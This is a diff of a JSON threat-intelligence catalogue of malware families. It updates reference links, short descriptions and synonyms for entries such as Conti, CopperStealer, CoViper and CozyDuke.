- "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf",
- "https://github.com/cdong1012/ContiUnpacker",
- "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8",
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/",
- "https://lifars.com/wp-content/uploads/2021/10/ContiRansomware_Whitepaper.pdf",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
- "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
- "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
- "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
- "https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement",
- "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
- "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
- "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://www.coveware.com/blog/2022/1/26/ransomware-as-a-service-innovation-curve",
- "https://arcticwolf.com/resources/blog/karakurt-web",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
"https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
+ "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://yoroi.company/research/conti-ransomware-source-code-a-well-designed-cots-ransomware/",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
+ "https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/",
+ "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://blog.talosintelligence.com/2021/09/Conti-leak-translation.html",
+ "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
"https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
- "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
- "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
- "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-conti",
- "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
- "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
- "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
- "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/",
- "https://unit42.paloaltonetworks.com/conti-ransomware-gang/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked",
- "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/",
- "https://www.connectwise.com/resources/conti-profile",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://securelist.com/modern-ransomware-groups-ttps/106824/",
+ "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
+ "https://www.bankinfosecurity.com/cybercrime-moves-conti-ransomware-absorbs-trickbot-malware-a-18573",
+ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
+ "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
"https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures",
+ "https://www.ic3.gov/Media/News/2021/210521.pdf",
+ "https://damonmccoy.com/papers/Ransomware_eCrime22.pdf",
+ "https://news.sophos.com/en-us/2021/02/16/what-to-expect-when-youve-been-hit-with-conti-ransomware/",
+ "https://arcticwolf.com/resources/blog/conti-ransomware-leak-analyzed",
+ "https://medium.com/@whickey000/how-i-cracked-conti-ransomware-groups-leaked-source-code-zip-file-e15d54663a8",
+ "https://www.bleepingcomputer.com/news/security/hackers-use-contis-leaked-ransomware-to-attack-russian-companies/",
+ "https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html",
+ "https://assets.sentinelone.com/ransomware-enterprise/conti-ransomware-unpacked",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://news.sophos.com/en-us/2022/02/28/conti-and-karma-actors-attack-healthcare-provider-at-same-time-through-proxyshell-exploits/?cmp=30728",
+ "https://www.darktrace.com/en/blog/the-double-extortion-business-conti-ransomware-gang-finds-new-avenues-of-negotiation/",
+ "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel",
+ "https://redcanary.com/blog/intelligence-insights-november-2021/",
+ "https://therecord.media/conti-ransomware-gang-chats-leaked-by-pro-ukraine-member/",
+ "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-source-code-leaked-by-ukrainian-researcher/",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomwares-internal-chats-leaked-after-siding-with-russia/",
+ "https://www.youtube.com/watch?v=cYx7sQRbjGA",
+ "https://thedfirreport.com/2021/05/12/conti-ransomware/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-hive-ransomware/",
+ "https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf",
+ "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
+ "https://www.threatstop.com/blog/conti-ransomware-source-code-leaked",
+ "https://blogs.vmware.com/security/2022/09/threat-report-illuminating-volume-shadow-deletion.html",
+ "https://www.prevailion.com/what-wicked-webs-we-unweave/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks",
+ "https://www.youtube.com/watch?v=hmaWy9QIC7c",
+ "https://0xthreatintel.medium.com/reversing-conti-ransomware-bfce15019e74",
+ "https://threatpost.com/affiliate-leaks-conti-ransomware-playbook/168442/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
+ "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
+ "https://blog.talosintelligence.com/2022/05/conti-and-hive-ransomware-operations.html",
+ "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
+ "https://cyware.com/news/ransomware-becomes-deadlier-conti-makes-the-most-money-39e17bae/",
+ "https://news.sophos.com/en-us/2022/02/22/cyberthreats-during-russian-ukrainian-tensions-what-can-we-learn-from-history-to-be-prepared/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
+ "https://news.sophos.com/en-us/2021/02/16/conti-ransomware-attack-day-by-day/",
+ "https://www.bleepingcomputer.com/news/security/angry-conti-ransomware-affiliate-leaks-gangs-attack-playbook/",
+ "https://www.prodaft.com/m/reports/Conti_TLPWHITE_v1.6_WVcSEtc.pdf",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf?1651576098",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
"https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love"
+ "https://intel471.com/blog/conti-vs-monti-a-reinvention-or-just-a-simple-rebranding",
+ "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/",
+ "https://blog.reversinglabs.com/blog/conversinglabs-ep-2-conti-pivots-as-ransomware-as-a-service-struggles",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://intel471.com/blog/shipping-companies-ransomware-credentials",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/",
+ "https://www.advintel.io/post/hydra-with-three-heads-blackbyte-the-future-of-ransomware-subsidiary-groups",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
+ "https://cluster25.io/2022/03/02/contis-source-code-deep-dive-into/",
+ "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
+ "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
+ "https://github.com/TheParmak/conti-leaks-englished",
+ "https://www.cyberark.com/resources/threat-research-blog/conti-group-leaked",
+ "https://twitter.com/AltShiftPrtScn/status/1417849181012647938",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
+ "https://www.youtube.com/watch?v=uORuVVQzZ0A",
+ "https://www.bleepingcomputer.com/news/security/conti-ransomware-gang-takes-over-trickbot-malware-operation/",
+ "https://www.elliptic.co/blog/conti-ransomware-nets-at-least-25.5-million-in-four-months",
+ "https://www.mbsd.jp/2022/03/08/assets/images/MBSD_Summary_of_ContiLeaks_Rev3.pdf",
+ "https://www.zscaler.com/blogs/security-research/conti-ransomware-attacks-persist-updated-version-despite-leaks",
+ "https://twitter.com/TheDFIRReport/status/1498642512935800833",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022",
+ "https://securityandtechnology.org/wp-content/uploads/2021/04/IST-Ransomware-Task-Force_Final_Report.pdf",
+ "https://www.redhotcyber.com/post/il-ransomware-conti-si-schiera-a-favore-della-russia",
+ "https://www.mbsd.jp/research/20210413/conti-ransomware/",
+ "https://github.com/cdong1012/ContiUnpacker",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
+ "https://thedfirreport.com/2021/12/13/diavol-ransomware/",
+ "https://twitter.com/AltShiftPrtScn/status/1423188974298861571",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-two/",
+ "https://share.vx-underground.org/Conti/",
+ "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html",
+ "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
+ "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/",
+ "https://blogs.blackberry.com/en/2022/09/the-curious-case-of-monti-ransomware-a-real-world-doppelganger",
+ "https://www.bleepingcomputer.com/news/security/ryuk-successor-conti-ransomware-releases-data-leak-site/",
+ "https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd",
+ "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/",
+ "https://www.bleepingcomputer.com/news/security/hhs-conti-ransomware-encrypted-80-percent-of-irelands-hse-it-systems/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf"
],
"synonyms": [],
"type": []
@@ -18318,8 +19427,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee",
- "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
"https://content.fireeye.com/apt/rpt-apt38",
+ "https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks",
"https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks"
],
"synonyms": [
@@ -18340,27 +19449,20 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "63be3d30-0c8d-4c0a-8eee-6c96880734cb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b",
"value": "CookieBag"
},
{
- "description": "",
+ "description": "According to PCRIsk, CopperStealer, also known as Mingloa, is a malicious program designed to steal sensitive/personal information. It also has the capability to cause chain infections (i.e., download/install additional malware).\r\n\r\nSignificant activity of CopperStealer has been observed in Brazil, India, Indonesia, Pakistan, and the Philippines. At the time of research, this malware had been noted being spread via websites offering illegal activation tools (\"cracks\") for licensed software products.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.copper_stealer",
"https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft",
"https://www.trendmicro.com/en_us/research/22/h/copperstealer-distributes-malicious-chromium-browser-extension-steal-cryptocurrencies.html"
],
- "synonyms": [],
+ "synonyms": [
+ "Mingloa"
+ ],
"type": []
},
"uuid": "87afcc5d-27f6-4427-b43c-4621a66e5041",
@@ -18371,8 +19473,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot",
- "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
"https://www.crowdstrike.com/blog/ecrime-ecosystem/",
+ "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report_BosonSpider.pdf"
],
"synonyms": [],
@@ -18386,11 +19488,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coredn",
- "https://blog.alyac.co.kr/2105",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content",
"https://www.symantec.com/security-center/writeup/2018-021216-4405-99#technicaldescription",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/",
"https://blog.talosintelligence.com/2019/01/fake-korean-job-posting.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/"
+ "https://blog.alyac.co.kr/2105",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/#atricle-content"
],
"synonyms": [],
"type": []
@@ -18403,27 +19505,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell",
- "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
- "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
- "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
- "http://malware.prevenity.com/2014/08/malware-info.html",
"http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html",
- "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
+ "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf",
+ "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf",
+ "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/",
+ "http://malware.prevenity.com/2014/08/malware-info.html"
],
"synonyms": [
"SOURFACE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "3948ce95-468e-4ce1-82b1-57439c6d6afd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e",
"value": "Coreshell"
},
@@ -18447,8 +19540,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cosmicduke",
- "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/",
- "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf"
+ "https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf",
+ "https://www.cyfirma.com/outofband/cosmicduke-malware-analysis/"
],
"synonyms": [],
"type": []
@@ -18461,18 +19554,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.cotx",
- "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
- "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://vblocalhost.com/uploads/VB2020-20.pdf",
- "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
"https://vb2020.vblocalhost.com/uploads/VB2020-20.pdf",
- "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
- "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
- "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
"https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html",
- "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html"
+ "https://st.drweb.com/static/new-www/news/2021/april/drweb_research_attacks_on_russian_research_institutes_en.pdf",
+ "https://www.socinvestigation.com/chinese-new-backdoor-deployed-for-cyberespionage/",
+ "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/chinese-apt-operation-lagtime-it-targets-government-information-technology",
+ "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
+ "https://www.youtube.com/watch?v=1WfPlgtfWnQ",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Targeted-attack-on-industrial-enterprises-and-public-institutions-En.pdf",
+ "https://vblocalhost.com/uploads/VB2020-20.pdf",
+ "https://vb2020.vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf"
],
"synonyms": [],
"type": []
@@ -18480,6 +19573,19 @@
"uuid": "47190b56-5176-4e8b-8c78-fcc10e511fa2",
"value": "Cotx RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova",
+ "https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "cad667c1-be0a-49db-b2fb-462082a04fbe",
+ "value": "Cova"
+ },
{
"description": "Covicli is a modified SSLeay32 dynamic library designated as a backdoor.\r\nThe dynamic library allows the attacker to communicate with the C2 over openSSL.",
"meta": {
@@ -18509,7 +19615,7 @@
"value": "Covid22"
},
{
- "description": "",
+ "description": "PCRisk notes that CoViper is yet another Coronavirus/COVID-19-themed malware infection, most likely proliferated as a file related to the pandemic. It operates by rewriting the system Master Boot Record (MBR). It does not delete the original, but rather creates a backup and replaces it with a custom MBR.\r\n\r\nTypically, malicious software that modifies MBRs do so to prevent the Operating System (OS) from being booted (i.e., started). It also displays a screen-encompassing message, often containing a ransom message - this disables user access to the device. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.coviper",
@@ -18522,6 +19628,25 @@
"uuid": "4d7d8496-52a6-47dc-abfe-4997af6dc465",
"value": "CoViper"
},
+ {
+ "description": "CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around\r\na core backdoor component. This component can be instructed by the C&C server to download\r\nand execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array\r\nof functionality. Known CozyDuke modules include:\r\n• Command execution module for executing arbitrary Windows Command Prompt commands\r\n• Password stealer module\r\n• NT LAN Manager (NTLM) hash stealer module\r\n• System information gathering module\r\n• Screenshot module",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.cozyduke",
+ "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html"
+ ],
+ "synonyms": [
+ "Cozer",
+ "CozyBear",
+ "CozyCar",
+ "EuroAPT"
+ ],
+ "type": []
+ },
+ "uuid": "b461afd0-f5fd-4c25-8367-4235a6e8b9b1",
+ "value": "COZYDUKE"
+ },
{
"description": "CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.",
"meta": {
@@ -18552,11 +19677,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crat",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://suspected.tistory.com/269",
"https://mp.weixin.qq.com/s/2sV-DrleHiJMSpSCW0kAMg",
- "https://www.secrss.com/articles/18635",
- "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html"
+ "https://suspected.tistory.com/269",
+ "https://blog.talosintelligence.com/2020/11/crat-and-plugins.html",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.secrss.com/articles/18635"
],
"synonyms": [],
"type": []
@@ -18582,10 +19707,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.credomap",
+ "https://securityscorecard.com/research/apt28s-stealer-called-credomap",
"https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://cert.gov.ua/article/341128"
+ "https://cert.gov.ua/article/341128",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war"
],
"synonyms": [],
"type": []
@@ -18606,6 +19732,32 @@
"uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706",
"value": "Credraptor"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creepysnail",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "a95d4aaa-302e-4a3c-a071-ba8eed978920",
+ "value": "CreepySnail"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.creep_exfil",
+ "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fc743725-2fa6-48dd-8797-57e298375505",
+ "value": "CreepExfil"
+ },
{
"description": "",
"meta": {
@@ -18623,39 +19775,39 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson",
- "https://twitter.com/katechondic/status/1502206599166939137",
+ "https://securelist.com/transparent-tribe-part-2/98233/",
+ "https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html",
"https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html",
- "https://s.tencent.com/research/report/669.html",
- "https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html?m=1",
- "https://labs.k7computing.com/index.php/transparent-tribe-targets-educational-institution/",
